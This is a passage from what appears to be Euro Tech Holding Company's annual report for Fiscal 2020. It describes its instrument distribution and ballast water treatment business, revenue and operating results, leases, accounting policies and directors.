During Fiscal 2020, there was decrease in revenues from trading and manufacturing activities. Revenue from Pact-Yixing in 2020 was US$4,246,000, while Shanghai Environmental had an operating loss of US$111,000. In addition, we incurred research and development costs of approximately US$493,000 in 2020 relating to BWTS for the IMO revised G8 requirements compliance and Pact-Yixing incurred an operating loss of approximately US$916,000. This resulted in operating loss from engineering activities of approximately US$1,027,000. We plan to wind down Shanghai Environmental. We are going to scale down Shanghai Euro Tech Limited to reduce the operating loss of manufacturing activities.

Our Growth Strategy

We are focusing our trading activities in Hong Kong, Macau and Guangdong. These cities are located close to our Hong Kong headquarters, our customers are more concentrated in these cities rendering customer support easier while incurring less travel expenses and while supporting distributorships in these cities as opposed to distributorships throughout China. We will continue our efforts to control costs to enhance operational efficiency. At the same time we will place greater focus at the manufacturing level on the chemical reagent business that we believe is more profitable. These chemical reagents are manufactured in our plant in Shanghai. These reagents include but are not limited to chemical oxygen demand (COD) analyzers, fine carbon tetrachloride, total nitrogen and free chlorine. These reagents are used by water and wastewater treatment plants and other industries such as beverage, as consumables with the water analyzers to monitor the quality of the water/ discharged water. In 2016, we received a contract worth about US$6.0 million from a foreign mobile phone company that covers design, supply, installation and the commissioning of industrial wastewater treatment and scrubber systems for its OEM plants in Shanghai, Shenzhen and Zhengzhou, China. This contract was completed in Fiscal 2017. In 2018, the Company received a PRC government grant for port ballast solution to fund the development of a prototype. The development of the ballast water port solution prototype was completed in 2019 and we have received four sales contracts from the port clients in China since October 2020. The port solution system is a system installed in port to offer ballast water treatment services for ocean going ships without their own ballast water treatment system (“BWTS”) and for those with damaged BWTS. The Company is now embarking on promotion activities for port solution systems in China and South East Asia to explore the growing demand, although no assurance can be given that we will be able to do so. We are applying the utility model patents and invention patents for this port solution system in China. In addition, we also continue to invest a portion of our resources to developing our BWTS for the global market, and, based upon Pact-Yixing’s competitive prices and the high quality of its services, feel positive about our ability to expand our worldwide customer base by working closely and actively with some international engineering companies. However, no assurance can be given that these efforts will be successful.

We also maintain a website which provides us with the ability to offer “on-line” product sales (via www.yibaynet.com.cn) at lower prices than our competitors. To date, however, this website has not generated any income and is inactive.

The Company believes that by assembling the products it distributes it may realize increased gross profit than if it remains only a product distributor. During the next twelve months, we intend to continue to assemble and/or manufacture additional products, and seek opportunities with our suppliers to assemble their products. We continue to promote our BWTS products that currently treat wastewater at rates of 200, 300, 500, 750, 1,200 and 1,250 cubic meters per hour and port solution system.

We also anticipate that, during Fiscal 2021, we will spend up to an additional US$100,000 in research and development costs on similar projects and potential research and development projects for the development of BWTS, portable ballast water checker, water testing equipment and monitoring equipment.

Future Planning and Expansion

We continuously search for products and equipment with substantial market potential for design and development. For example, international shipping ballast water cargo stowaway species and microorganisms that create unpredictable ecosystem contaminations as ballast water tanks are emptied or refilled at ports of call. Pact has been attempting to develop a non-chemical BWTS since late 2010. In 2012, Pact successfully completed and passed the land based test requirement, and, in 2014, Pact passed ship board testing and obtained CCS certification in the PRC and compliance with the IMO convention. In September 2016, the International Maritime Organization received acceptance from 52 States, representing approximately 35% of world merchant shipping tonnage. This triggered the applicability of the entry into force of the Ballast Water Management Convention, which occurred on September 8, 2017. In July 2017, IMO decided that the phase-in period for ballast water system retrofits started on September 8, 2019. The IMO convention stipulates that type approval for revised G8 requirements must be obtained for all BWTS installed on or after 28 October 2020, and we have been in compliance with such requirements.

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

Customers for the analytical instruments include government agencies, academic and research institutions, major laboratories and beverage producers, including analytical system to the Hong Kong Government Laboratory for analysis of persistent organic pollutants (POPs) and pesticides in the environment. Customers for water quality monitoring instruments also include government agencies. The Company derived approximately 58.8%, 70.0% and 70.4% of its revenues from the sale of scientific instruments during Fiscal 2020, 2019 and 2018, respectively.

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

The Company derived approximately 39.6%, 28.3% and 28.5% of revenues from the sale of power solutions and process during Fiscal 2020, 2019 and 2018, respectively.

Technical Support. The Company’s technical support staff provides customers with maintenance, installation assistance, and calibration services, and assists sales personnel in giving technical advice to and performing product demonstrations for customers. The Company derived approximately 1.6%, 1.7% and 1.1% of its revenues from technical support operations during Fiscal 2020, 2019 and 2018, respectively.

Customers. During Fiscal 2020, the Company distributed products to approximately 1,000 customers, located in Hong Kong, the PRC and Macau such as the Hong Kong Food and Environmental Hygiene Department, Hong Kong Water Supplies Department, Government Laboratory, Drainage Services Department, and various Environmental Monitoring Centers in the PRC. For the year ended December 31, 2020, sales to our three largest customers amounted in the aggregate to approximately 23% of our total revenue, with one of such customers accounting for 9% of our total revenue.

Manufacturing and Product Assembly Operations

The Company, through its PRC subsidiary, Shanghai Euro Tech Limited located in the Pudong Jin Qiao Export Processing Zone of Shanghai, engages in the development, production, sales and servicing of environmental equipment, including the development of modern laboratory analyzers, on-line measuring equipment and other analyzers for chemicals. Our products are “tailor-made” for the diversified needs of equipment users. Main products include infrared photometric oil analyzer (“IPOA”), COD analyzers, total organic carbon (“TOC”) analyzer, turbidity meters, total suspended solid analyzers, dissolved oxygen analyzers, various types of spectrophotometers as well as a full spectrum of matching chemical reagents. We also offer turbidity meters manufactured by the Company and directed at water treatment plants, environmental monitoring status, and hydrological stations. We also offer our own TOC analytical instrument that measures the degree of the pollution. We have also upgraded other existing instruments and developed a quick response COD test instrument for use on surface water, underground water and domestic and industrial wastewater. Additionally, we offer a flue gas emissions analyzer for use in environmental compliance monitoring. We also developed energy meters (devices measuring electric energy consumption and corresponding carbon dioxide emissions) and water toxicity analysis instruments. Although it takes substantial time, effort and expense to develop, test and market a product, our sales of the TOC analyzer and the flue gas emissions analyzer have been nominal to date. We have been unable to find a suitable market to sell the energy meters. We have developed evaporator for extraction of organic solvents to remove the impurities prior to chemical analysis and are developing a larger size evaporator. Our customers are analyzing environmental pollutants, toxic substances such as pesticides and drug residues in food, drugs in clinical or forensic applications. We started test sale of this product in second half of fiscal 2015 and received orders of 5, 12 and 11 sets in Fiscal 2020, 2019 and 2018, respectively. The Company has developed a handheld ballast water checker which is the first handheld rapid indicative compliance instrument made in China, based on well accepted PAM fluorescence Technology. The instrument is a very powerful screening tool for ship owners, compliance officers, ship builders and BWTS providers. The company was one of the few qualified local and foreign candidates to participate in China Marine Safety Administration’s (“MSA”) evaluation of indicative testing instruments to be used by Port State Control officers for compliance test according to IMO D2 standard. The unofficial reports of comparison data between our instrument and lab test results indicated that our instrument readings trend followed the actual lab test results closely. We obtained patent approval in China and got the environmental testing certificate according to Chinese Standard GB/T 11606-2007 from Shanghai Institute of Measurement and Technology. We carried out testing of this instrument at the land-based test facility of one of the Chinese National Engineering Laboratories for Ballast Water Testing and type approval according to IMO guidelines and got a certified test report from this approved laboratory. We are doing the ground work of promoting our instrument to ship owners, shipping service and equipment providers, ship builders, BWTS manufacturers and local MSA. We also participated in a number of trade shows and exhibitions. Although the regulation is not enforced now, we are getting market awareness of our product application.

Sources of Supply

The Company distributes products manufactured by a substantial number of major American, European and Japanese corporations, including Thermo, Metertest, Stanford, Hach, Hioki and Biotage, which are the Company’s largest suppliers, with purchases from them accounting for approximately 55%, 0%, 8%, 7%, 7% and 2% during Fiscal 2018, 53%, 0%, 7%, 6%, 6% and 2% during Fiscal 2019, and 30%, 12%, 10%, 9%, 6% and 5% during Fiscal 2020 respectively. The Company has exclusivity agreements for specified geographic areas with many of its suppliers for certain products. Those agreements do not encompass all products distributed by the Company or all of the market areas serviced by the Company. In addition, some of these agreements are memorialized not as formal contracts but rather through other acknowledgements or correspondence which may contain a vague, if any, description of the terms and conditions of such agreement or arrangement, and therefore may be unenforceable. The Company has agreements and has an Authorization Letter from Hach appointing the Company as Hach’s distributor in Hong Kong and Macau which is valid until December 15, 2021. The Company has an Agreement with Thermo granting the Company rights to sell Thermo’s Mass Spec Products to the Government and hospitals in Hong Kong which is valid until March 31, 2022. The Company has only an Authorization Letter from Stanford appointing the Company as Stanford’s sales representative in the PRC and Hong Kong. The Company has only an Authorization Letter from Hioki appointing the Company as Hioki’s sole agent in Hong Kong and Macau. The Company has an agency agreement with Metertest to jointly sell its products in the PRC which is valid until December 31, 2022. The Company has an Agent Certificate from Biotage authorizing the Company as Biotage’s sole agent in Hong Kong and Macau. Although alternative sources of supply exist, there can be no assurance that the termination of the Company’s relationship with any of the above or other vendors would not have an adverse effect on operations.

Regulatory Environment

Concerns about and awareness of pollution problems and environmental issues have grown at all levels of PRC government as the PRC experienced economic growth. Environmental protection laws and strict regulations have been enacted and are buttressed by increased budget allocations for environmental regulation, monitoring and enforcement. The PRC’s primary environmental protection agency is the Ministry of Ecology and Environment (“MEE”) which replaced the Ministry of Environmental Protection (“MEP”) after the 13th National People’s Congress was held in March 2018. The new streamlined ministry is a sign of China’s upgraded dedication to the task of improving its environment. In the 19th Five-Year Program (2016-2020), MEE launched three major campaigns of prevention and control of environment, including action plans for control of air pollution, water pollution and soil pollution. Special action was also taken in the Beijing-Tianjin-Hebei region and the Yangtze River economic belt for air and water pollution control, respectively. The number of sections of the Yangtze River Basin with total phosphorus exceeding the upper limit decreased by 40.7% in 2019 as compared with that of 2018. The Yangtze River Protection Law officially went into effect in March 2021, with the aim of protecting China's longest river, strengthening the ecological protection and restoration of the Yangtze River Basin. Major indicators to assess air quality are SO2, NOX, PM10 and PM2.5. Indicators for water are COD, petroleum oil, total nitrogen, total phosphorus and ammonia nitrogen. We have designed and built instruments to detect these indicators. The second national pollution source survey found that the emission of air and water pollutants reduced steadily from 2016 to 2019. In-depth investigation of soil environment quality, building monitoring network and improvement of soil quality information management are ongoing. The government’s goal is to have 90% safe utilization of polluted farmland. The government has outsourced testing to commercial testing labs. Heavy metals and organic pollutants are being analyzed. Our concentrator automates evaporation and improves data quality for organic analysis. There can be no assurance that the agencies will continue to use our products for these purposes, or that other market competitors will not enter the market with superior products, distribution systems or more competitive prices. See – “Competition.”

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

During Fiscal 2020, 2019 and 2018, the Company’s gross profit margins were approximately 28%, 25% and 18%, respectively. The Company believes that it competes with the PRC manufacturers on the basis of quality and technology. The Company believes it offers foreign-manufactured products which are of higher quality and use more advanced technology than products manufactured in the PRC. The Company believes that it competes with foreign manufacturers and other distributors of their products on the basis of the Company’s established reputation. Pact-Yixing focuses on a market of providing water and waste water treatment services to multinational companies. The Company competes in this market based upon the quality of its products and having a knowledgeable staff, but faces competition from large PRC and multinational engineering companies, that, in the Company’s view, market their services based upon low pricing as opposed to quality of service.

Website

The Company maintains a website at http://www.euro-tech.com.

The Company has an inactive internet platform located at http://www.chinah2o.com. The website is directed toward environmental businesses in China. The website provides environmental news, directories of western suppliers, potential clients in China, and advertisement space but has not generated external revenue.

The Company, through its subsidiary, Euro Tech Trading (Shanghai) Limited, a PRC corporation, has an internet platform. The website is located at http://www.yibaynet.com.cn. The website is an instrument sourcing platform under which potential customers can ask for sales quotations and place orders via internet but is dormant now.

Sales and Marketing

The Company distributes products through its principal office located in Hong Kong, and its wholly-owned trading company in Shanghai. During Fiscal 2018, the Company had a marketing and sales force of 15 people who are paid a salary plus a sales-based commission. During Fiscal 2019, the Company had a marketing and sales force of 15 people who are paid a salary plus a sales-based commission. During Fiscal 2020, the Company had a marketing and sales force of 13 people who are paid a salary plus a sales-based commission. Our sales staff assists customers in selecting the equipment, auxiliary parts and products to suit customer specifications.

Our remaining sales subsidiary is located in Shanghai. We closed Chongqing, Guangzhou and Xi’an subsidiaries in Fiscal 2019.

Our representative office is located in Beijing, which is a sales office of Shanghai Euro Tech Limited was closed in January 2021.

Major Customers

Maintaining major customers is important to us. For the year ended December 31, 2020, sales to our three largest customers amounted in the aggregate to approximately 23% of our total revenue. For the year ended December 31, 2019, sales to our three largest customers amounted in the aggregate to approximately 34% of our total revenue. For the year ended December 31, 2018, sales to our two largest customers amounted in the aggregate to approximately 22% of our total revenue.

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

D. PROPERTY, PLANTS AND EQUIPMENT

The Company has various operating lease agreements for office and industrial premises. Its leases have remaining lease terms of several months to two years

The components of lease expense for the year ended December 31, 2020 are as follows:

US$’000

Operating lease cost	257
Short-term lease cost	64
Total lease cost	321

Maturities of lease liabilities as of December 31, 2020 were as follows:

Operating leases
US$’000
Year ending December 31,
2021	144
2022	102
Total lease payments	246
Less: imputed interest	(34)
Total	212

The Company maintains an executive office at Unit C and D, 18/F., Gee Chang Hong Centre, 65 Wong Chuk Hang Road, Hong Kong. The Company occupies approximately 7,000 square feet of office and warehouse storage space under a two year lease that expires in May 2021 and will be renewed with a monthly rental payment of approximately US$8,308. The warehouse storage space is used to hold products for distribution to our customers via common carriers.

The Company’s owned property in Hong Kong was sold in February 2020.

Euro Tech Trading (Shanghai) Limited has one office rented pursuant to short term leases, at an aggregate monthly rent of approximately US$330. Shanghai Euro Tech Limited’s premises are rented pursuant to a short term lease for a monthly rent of approximately US$3,795. Shanghai Euro Tech Environmental Engineering Company Limited's premises are also rented pursuant to a short term lease for a monthly rent of approximately US$695.

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

A. OPERATING RESULTS

Background - Political and Economic Conditions in Hong Kong and the PRC

The Company’s operations are located almost entirely within, and revenues are almost entirely generated from Hong Kong and the PRC. Set forth below are the approximate percentage of the Company’s revenue from customers in the PRC and Hong Kong for the fiscal years indicated:

Fiscal Year	PRC	Hong Kong

2018	40%	56%
2019	40%	58%
2020	38%	60%

Sales to customers situated in Macau and elsewhere through Fiscal 2020 were nominal. This makes the Company particularly susceptible to changes in the political and economic climate of either Hong Kong or the PRC.

Hong Kong. Hong Kong has been one of the prime centers for commercial activity and economic development recently in Southeast Asia. On July 1, 1997, sovereignty over Hong Kong was transferred from the United Kingdom to the PRC. As provided in the Sino-British Joint Declaration and the Basic Law, the Hong Kong SAR is provided a high degree of autonomy except in foreign and defense affairs. The Basic Law provides that the Hong Kong SAR is to have its own legislature, legal and judicial system and full economic autonomy for 50 years after the transfer of sovereignty. Based on the current political conditions and the Company’s understanding of the Basic Law, the Company does not believe that the transfer of sovereignty over Hong Kong has had or will have an adverse impact on its financial and operating environment. Although the Chinese government has pledged to maintain the economic and political autonomy of Hong Kong over its internal affairs, there is no assurance that such pledge will continue to be honored if there are changes in the Chinese political or economic climate. Revenue in Hong Kong, expressed as a percentage of our revenue, increased by 3% in Fiscal 2018 as compared with Fiscal 2017. Revenue in Hong Kong, expressed as a percentage of our revenue, increased by 2% in Fiscal 2019 as compared with Fiscal 2018. Revenue in Hong Kong, expressed as a percentage of our revenue, increased by 2% in Fiscal 2020 as compared with Fiscal 2019. See – Item 3D. “Key Information — Risk Factors.”

PRC. The PRC has been a socialist state since 1949. For more than half a century, the PRC’s economy has been, and presently continues to be, a socialist economy operating under government controls promulgated under various state plans adopted by central Chinese government authorities and implemented, to a large extent, by provincial and local authorities who may set production and development targets. However, since approximately the early 1980s, the PRC’s national government has undertaken certain reforms to permit greater provincial and local economic autonomy and private economic activities. Any change in political or economic conditions may substantially adversely affect these reform initiatives and, in turn, the Company. Revenue in the PRC, expressed as a percentage of total revenue, decreased by 5% in Fiscal 2018 as compared with Fiscal 2017. The decrease was primarily due to the increase in revenue in PRC were less than the overall increase in revenue of the Company. Revenue in the PRC, expressed as a percentage of total revenue, was the same in Fiscal 2019 as compared with Fiscal 2018. Revenue in the PRC, expressed as a percentage of total revenue, decreased by 2% in Fiscal 2020 as compared with Fiscal 2019. The decrease was primarily due to the delay in completion of engineering projects in PRC as a result of COVID-19. See – Item 3D. “Key Information — Risk Factors.”

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

The following table presents selected statement of operations data expressed in thousands of US$ and as a percentage of revenue for the Company’s fiscal years indicated below:

	2020		2019		2018		2017		2016
Revenue	$13,357	100%	$17,399	100%	$20,104	100%	$17,350	100%	$22,478	100%
Cost of revenue	$9,672	72.4%	$12,982	74.6%	$16,405	81.6%	$12,937	74.6%	$17,527	78.0%
Gross profit	3,685	27.6%	$4,417	25.4%	$3,699	18.4%	$4,413	25.4%	$4,951	22.0%
Selling and administrative expenses	$5,374	40.2%	$4,853	27.9%	$4,751	23.6%	$4,976	28.7%	$5,602	24.9%
Income / (loss) before income taxes, equity in income / (loss) of affiliates and non-controlling interests	$63	0.5%	$(310)	-1.8%	$(963)	-4.8%	$(564)	-3.3%	$(640)	-2.8%
Income taxes (expense) / credit	$(96)	-0.7%	$(37)	-0.2%	$312	1.6%	$(28)	-0.2%	$(228)	-1.0%
Equity in income / (loss) of affiliates	$435	3.3%	$137	0.8%	$(932)	-4.6%	$831	4.8%	$1,002	4.5%
Net gain on disposal of affiliate	$-	-	$-	-	$1,522	7.6%	-	-	-	-
Net income / (loss)	$402	3.0%	$(210)	-1.2%	$(61)	-0.3%	$367	2.1%	$158	0.7%
Net loss attributable to non-controlling interests	$367	2.7%	$64	0.4%	$149	0.7%	$106	0.6%	$73	0.3%
Net income / (loss) attributable to Euro Tech Holding Company Limited's shareholders	$769	5.7%	$(146)	-0.8%	$88	0.4%	$473	2.7%	$231	1.0%

Fiscal Year Ended December 31, 2020 Compared to Fiscal Year Ended December 31, 2019

Revenue; Gross Profit and Cost of Revenue. Revenue decreased by approximately US$4,042,000 or 23.2% to approximately US$13,357,000 in Fiscal 2020 from approximately US$17,399,000 in Fiscal 2019. Revenue from trading and manufacturing activities and engineering activities decreased by approximately US$2,401,000 and decreased by US$1,641,000, respectively. The decrease in revenues from trading and manufacturing activities was principally due to decrease in big system sales. Pact-Yixing’s revenues of approximately US$4,246,000 and US$5,522,000 were included in our revenues in Fiscal 2020 and Fiscal 2019, respectively and the decrease was principally due to the delay in completion of the projects as affected by COVID-19.

Gross profits decreased by approximately US$732,000 or 16.6% to approximately US$3,685,000 for Fiscal 2020 as compared to approximately US$4,417,000 for Fiscal 2019. During Fiscal 2020, the Company’s cost of revenues was approximately US$9,672,000 or 72.4% of revenues, in comparison to approximately US$12,982,000 or 74.6% for Fiscal 2019. Cost of revenue expressed as a percentage of revenue decreased by 2.2% in Fiscal 2020 as compared with Fiscal 2019. Cost of revenues from trading and manufacturing activities and engineering activities decreased by approximately US$2,237,000 and US$1,073,000, respectively. The overall change was principally due to decrease in trading activities of big system sales which were of lower gross margin and the increase in the gross profit margin percentage of engineering contracts. Pact-Yixing contributed approximately US$1,257,000 to our gross profit in Fiscal 2020, a decrease of approximately US$562,000 from Fiscal 2019.

Selling and Administrative Expenses. Selling and administrative expenses were approximately US$5,374,000 in Fiscal 2020, an increase of approximately US$521,000 or 10.7% from approximately US$4,853,000 in Fiscal 2019. The increase was principally due to the increase in research and development costs relating to BWTS of approximately US$458,000 for the IMO revised G8 requirements compliance and redundancy provision of approximately US$453,000 to scale down the operation of Shanghai Euro Tech Limited. The normal selling and administrative expenses were decreased after exclusion of these non-recurrent expenses.

Equity in Income / (Loss) of Affiliates. Equity in income of affiliates was approximately income of US$435,000 in Fiscal 2020, an increase of approximately US$298,000 from income of affiliates of approximately US$137,000 in Fiscal 2019. The increase in equity in income of affiliates was principally due to recovery of accounts receivable for which impairment provision was made in previous years..

Interest Income. Interest income in Fiscal 2020 was approximately US$28,000 as compared to approximately US$83,000 in Fiscal 2019.

Other income / (losses). Other income increased by approximately US$255,000 to approximately US$307,000 in Fiscal 2020 from approximately US$52,000 in Fiscal 2019. The increase in other income was principally due to exchange gain of approximately US$101,000, and government subsidies for salaries of approximately US$147,000.

Income Taxes. Tax expense of approximately US$96,000 in Fiscal 2020 as compared to tax expense of approximately US$37,000 in Fiscal 2019. The increase in tax expense was principally due to the increase in assessable profits.

Net Income. Profit / (loss) from continuing operations was approximately profit of US$769,000 in Fiscal 2020 as compared to loss of approximately (US$146,000) in Fiscal 2019. This change was primarily due to increase in operating loss as a result of decrease in revenue and increase in non-recurrent research and development costs and redundancy provision expenses, which was fully covered by the gain on disposal of a property.

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

B. LIQUIDITY AND CAPITAL RESOURCES

The Company has primarily used its own funds to finance accounts receivable, net, contract assets, inventories, and capital expenditures including purchases of property, office furniture and equipment, computers and calibration equipment. The Company has historically met its cash requirements from cash flows from operations, short-term borrowings, bank lines of credit, and long-term mortgage bank loans. The Company expects, but can make no assurances that its present cash reserves, cash from operations and existing available bank credit facilities exercises would be sufficient to fund its future capital expenditure requirements. Working capital at the end of Fiscal 2020 and Fiscal 2019 were approximately US$4,915,000 and US$5,350,000, respectively.

As of December 31, 2020, we had approximately US$3,519,000 in cash and cash equivalents, compared to approximately US$5,991,000 in cash and cash equivalents as of December 31, 2019. Net cash (used in) / provided by operating activities was (US$2,035,000) for the year ended December 31, 2020 as compared to (US$266,000) for the year ended December 31, 2019 and (US$1,345,000) for the year ended December 31, 2018. Net cash provided by / (used in) investing activities was US$2,043,000, (US$169,000) and US$5,083,000 for the years ended December 31, 2020, 2019 and 2018, respectively. Net cash (used in) / provided by financing activities was (US$1,503,000) for the year ended December 31, 2020 as a result of decrease in bank borrowings related to trade finance purchases, and dividend payment of approximately (US$1,299,000) as compared to US$565,000 for the year ended December 31, 2019.

The Company had various banking facilities available for overdraft, import and export credits and foreign exchange contracts from which the Company could have accessed up to approximately US$897,000 at December 31, 2020. These credit facilities were obtained on the conditions that, among other things, the Company pledge bank deposit of approximately US$897,000, not create a charge or lien on its other assets in favor of third parties without such bank’s consent, and the Company maintaining a certain level of net worth.

Cash decreased from approximately US$5,991,000 at the end of Fiscal 2019 to US$3,519,000 at the end of Fiscal 2020. The principal reason for the decrease in cash was net cash outflow in financing activities.

The Company’s accounts receivable, net decreased from approximately US$3,586,000 at the end of Fiscal 2019 to US$3,199,000 at the end of Fiscal 2020. The amount of accounts receivable, net subject to collection is expected to be received under normal commercial trading terms.

The Company’s inventories decreased from approximately US$586,000 at the end of Fiscal 2019 to US$342,000 at the end of Fiscal 2020.

The Company’s capital expenditures were approximately US$11,000 and US$21,000 in Fiscal 2020 and Fiscal 2019, respectively. Capital expenditures during Fiscal 2020 and Fiscal 2019 were incurred primarily in connection with the purchase of office equipment, and furniture and fixtures. The Company continues to develop new products. If such products developments are indeed made, the Company may expect to incur significantly larger capital expenditures, for which the Company presently intends, but as to which no assurance can be made, to use existing cash reserves, cash from operations and available bank credit facilities.

Goodwill

As of December 31, 2020, the Group completed the annual impairment test (i.e. comparing the carrying amount of the net assets, including goodwill, with the fair value of Yixing Pact Environmental Technology Co., Ltd and Pact Asia Pacific Limited as of December 31, 2020). Based on management’s assessment, the Group determined that there was no impairment of goodwill as of December 31, 2020.

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

Investments in Affiliates

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

Revenue Recognition

Our revenue is derived from long-term contracts for customers in our engineering segment, as well as short-term contracts for customers in our trading and manufacturing segment. Accounting treatment for these contracts in accordance with Accounting Standards Update (“ASU”) 2014-09 (Accounting Standards Codification (“ASC”) Topic 606, Revenue from Contracts with Customer), is as follows:

Performance obligations satisfied over time (Engineering services)

Recognition of performance obligations

A performance obligation is a promise in a contract to transfer a distinct good or service to the customer, and is the unit of account in the new revenue standard. The contract transaction price is allocated to each distinct performance obligation and recognized as revenue when, or as, the performance obligation is satisfied. Engineering service projects typically span between several days to over 5 years. The majority of our contracts have a single performance obligation as the promise to transfer the individual goods or services is not separately identifiable from other promises in the contracts and, therefore, is not distinct. Some contracts have multiple performance obligations, most commonly due to the contract covering multiple phases of the project life cycle (engineering).

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

Performance obligations satisfied at a point-in-time (Trading and manufacturing)

Revenue for our trading and manufacturing contracts is recognized at a point in time. Sales are recognized when control of the products has transferred, being when the products are delivered to the customer. Delivery occurs when the products have been delivered to the point of receipt by customer.

Rental Income

Rental income from operating leases is recognized in consolidated statements of operations and comprehensive income/ (loss) on a straight-line basis over the term of the relevant lease.

Research and Development Costs

Research and development costs (“R&D” costs) are expensed as incurred. The R&D costs amounted to approximately US$497,000, US$35,000 and US$184,000 for the years ended December 31, 2020, 2019 and 2018, respectively and were included in “Selling and Administrative expenses” in the Group’s consolidated statements of operations and comprehensive income / (loss).

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

Goodwill

Goodwill is not amortized. The Group performs either a qualitative or quantitative assessment to review goodwill for impairment on an annual basis. This assessment is performed at the beginning of the fourth quarter, or when circumstances change, such as a significant adverse change in the business climate or the decision to sell a business, both of which would indicate that impairment may have occurred.

A qualitative assessment considers financial, industry, segment and macroeconomic factors, if the qualitative assessment indicates a potential for impairment, a quantitative assessment is performed to determine if impairment exists. The quantitative assessment begins with a comparison of the fair value of the reporting unit with its carrying value. If the carrying amount of the reporting unit exceeds its fair value, an impairment loss would be recognized in an amount equal to that excess, limited to the total amount of the goodwill allocated to the reporting unit. If the carrying value of goodwill exceeds its implied fair value, an impairment charge would be recorded in the statement of operations.

Foreign Currency Translation

The assets and liabilities of the Group’s subsidiaries denominated in currencies other than U.S. dollars are translated into U.S. dollars using the applicable exchange rates at the consolidated balance sheet date. For consolidated statements of operations and comprehensive income/(loss)’ items, amounts denominated in currencies other than U.S. dollars were translated into U.S. dollars using the average exchange rate during the period. Equity accounts were translated at their historical exchange rates. Net gains and losses resulting from translation of foreign currency on consolidated financial statements are included in the consolidated statements of stockholders’ equity as accumulated other comprehensive income. Foreign currency transaction gains and losses are reflected in the consolidated statements of operations and comprehensive income/(loss).

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

Leases Arrangements

In the ordinary course of business, the Group enters into a variety of operating lease arrangements.

Operating right-of-use leases.

Operating right-of-use leases are included in operating lease right-of-use assets, current portion of long-term operating lease obligations and long-term operating lease obligations, net of current maturities on the Group's consolidated balance sheets, as appropriate. Operating lease right-of-use assets and operating lease liabilites are recognized based on the present value of the future minimum lease payments over the lease term at commencement date. As most of the Group's leases do not provide an implicit rate to calculate present value, the Group determins this rate by estimating the Group's incremental borrowing rate, utilizing the borrowing rates associated with the Group's various debt instruments. The operating lease right-of-use asset also includes any lease payments made and initial direct costs incurred and excludes lease incentives. Our lease terms may include options to extend or terminate the lease when it is reasonably certain that we will exercise that option.

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

Recently Adopted Accounting Pronouncements

In June 2016, the FASB issued ASU 2016-13, Financial Instruments-Credit Losses (Topic 326), Measurement of Credit Losses on Financial Instruments, which introduced an expected credit loss methodology for the measurement and recognition of credit losses on most financial instruments, including trade receivables and off-balance sheet credit exposures. Under this guidance, an entity is required to consider a broader range of information to estimate expected credit losses, which may result in earlier recognition of losses. This ASU also requires disclosure of information regarding how a company developed its allowance, including changes in the factors that influenced management’s estimate of expected credit losses and the reasons for those changes.

In January 2017, the FASB issued ASU 2017-04, Intangibles-Goodwill and Other (Topic 350): Simplifying the Test for Goodwill Impairment, which simplifies the subsequent measurement of goodwill, through the elimination of Step 2 from the goodwill impairment test. Instead, an entity should perform its annual, or interim, goodwill impairment test by comparing the fair value of a reporting unit with its carrying amount. The Group adopted this ASU on a prospective basis in January 2020 and there was no effect on the Group’s consolidated financial statements.

In August 2018, the FASB issued ASU 2018-13, Fair Value Measurement (Topic 820): Disclosure Framework-Changes to the Disclosure Requirements for Fair Value Measurement, which modifies the disclosure requirements for Level 1, Level 2 and Level 3 instruments in the fair value hierarchy. The Group adopted this ASU in January 2020 and there was no effect on the consolidated financial statements or disclosures.

Recently Issued Accounting Pronouncements Not Yet Adopted

In December 2019, the FASB issued ASU 2019-12, Simplifying the Accounting for Income Taxes, which simplifies the accounting for income taxes, eliminates certain exceptions within ASC 740, Income Taxes, and clarifies certain aspects of the current guidance to promote consistent application among reporting entities. The guidance is effective for fiscal years beginning after December 15, 2020, and interim periods within those fiscal years, with early adoption permitted. Upon adoption, the Group must apply certain aspects of this standard retrospectively for all periods presented while other aspects are applied on a modified retrospective basis through a cumulative-effect adjustment to retained earnings as of the beginning of the fiscal year of adoption. The adoption of this standard is not expected to have a material impact on the Group’s consolidated financial statements or disclosures.

In January 2020, the FASB issued ASU 2020-01, “Investments-Equity Securities (Topic 321), Investments-Equity Method and Joint Ventures (Topic 323), and Derivatives and Hedging (Topic 815),” an amendment clarifying the interaction between accounting standards related to equity securities, equity method investments, and certain derivative instruments. The guidance is effective for fiscal years beginning after December 15, 2020. ASU 2020-01 will become effective for the Group in fiscal 2022. The Group is currently evaluating the impact of the new guidance on its consolidated financial statements.

In October 2020, the FASB issued ASU 2020-10, “Codification Improvements,” this ASU affects a wide variety of Topics in the Codification. They apply to all reporting entities within the scope of the affected accounting guidance. More specifically, this ASU, among other things, contains amendments that improve the consistency of the Codification by including all disclosure guidance in the appropriate Disclosure Section (Section 50). Many of the amendments arose because the FASB provided an option to give certain information either on the face of the financial statements or in the notes to financial statements and that option only was included in the Other Presentation Matters Section (Section 45) of the Codification. The option to disclose information in the notes to financial statements should have been codified in the Disclosure Section as well as the Other Presentation Matters Section (or other Section of the Codification in which the option to disclose in the notes to financial statements appears). Those amendments are not expected to change current practice. The amendments are effective for annual periods beginning after December 15, 2021, and interim periods within annual periods beginning after December 15, 2022. Early application of the amendments is permitted for and varies based on the entity. The amendments should be applied retrospectively and at the beginning of the period that includes the adoption date. The Group is currently evaluating the impact of the new guidance on its consolidated financial statements.

C. RESEARCH AND DEVELOPMENT, PATENTS AND LICENSES, ETC.

During Fiscal 2020, 2019 and 2018, the Company expensed approximately US$497,000, US$35,000 and US$184,000, respectively, on the research and development of its products.

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

F. TABULAR DISCLOSURE OF CONTRACTUAL OBLIGATIONS

The future undiscounted minimum lease payments, as reconciled to the discounted minimum lease obligation indicated on the Group’s consolidated balance sheets, under current portion of operating lease obligations and operating lease obligations, net of current maturities, as of December 31, 2020 were as follows:

		Payment due by December 31, (in US$ thousands)
	Total	2021	2022	2023	2024 and after
Operating lease commitments	212	118	94	-	-
Total	212	118	94	-	-

G.            Safe Harbor

See “Forward-Looking Information” on page 4 of this annual report.

ITEM 6. DIRECTORS, SENIOR MANAGEMENT AND EMPLOYEES

A. DIRECTORS AND SENIOR MANAGEMENT

Information concerning the Directors and Executive Officers of the Company are as follows:

Name	Age	Position
T.C. Leung	77	Chairman of the Board of Directors and Chief Executive Officer

Jerry Wong	62	Director and Chief Financial Officer

Alex Sham	57	Director

Y.K. Liang	91	Director

Fu Ming Chen	72	Director

Janet Cheang	65	Director

David YL Leung	47	Director

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

B. COMPENSATION.

